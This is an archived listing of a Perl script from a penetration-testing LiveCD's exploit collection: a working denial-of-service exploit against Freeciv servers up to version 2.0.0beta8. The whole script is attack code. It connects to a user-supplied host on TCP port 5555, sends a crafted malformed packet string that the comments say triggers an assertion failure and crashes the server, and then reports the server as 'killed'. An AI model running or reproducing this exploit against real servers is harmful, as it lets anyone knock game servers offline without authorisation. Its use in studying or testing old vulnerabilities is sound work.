home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / games / freeciv.pl < prev    next >
Encoding:
Perl Script  |  2005-03-16  |  1.2 KB  |  49 lines
  1. #!/usr/bin/perl
  2.  
  3. # Freeciv Server <= 2.0.0beta8 DoS exploit (windows&linux releases)
  4. # Vendor: http://www.freeciv.org/
  5. # Advisory: Nico Spicher [ http://triplex.it-helpnet.de/ ]
  6.  
  7. # There is a vulnerability in the handling of incoming data. If the request
  8. # is uncomplete or modified, the server crashes because of a bug in the
  9. # get_packet_from_connection function in packets.c. Look at the code below
  10. # for more information.
  11.  
  12. use IO::Socket;
  13.  
  14. if (@ARGV < 1)
  15.  {
  16. system "clear";
  17. print "[-] Usage: exploit_freeciv.pl <host ip>\n";
  18. exit(1);
  19.  }
  20. system "clear";
  21.  
  22. $server = $ARGV[0];
  23. print "[-] Freeciv DoS Exploit\n\n";
  24. print "[-] Server IP: ";
  25. print $server;
  26. print "\n[-] Connecting to IP ...\n";
  27.  
  28. $socket = IO::Socket::INET->new(
  29.     Proto => "tcp",
  30.     PeerAddr => "$server",
  31.     PeerPort => "5555"); unless ($socket) { die "[-] $server is offline\n" }
  32.  
  33. print "[-] Connected\n\n";
  34.  
  35. print "[-] Creating string\n";
  36.  
  37. $string="@+2.0 conn_ping_info username_info-beta8";
  38. # >civserver: packets.c:385: get_packet_from_connection:
  39. #           Assertion 'error == 0' failed.
  40. # Aborted(core dumped)
  41.  
  42. print "[-] Sending string\n\n";
  43.  
  44. print $socket "$string";
  45.  
  46. print "[>] Attack successful - Server killed\n";
  47.  
  48. close($socket);
  49.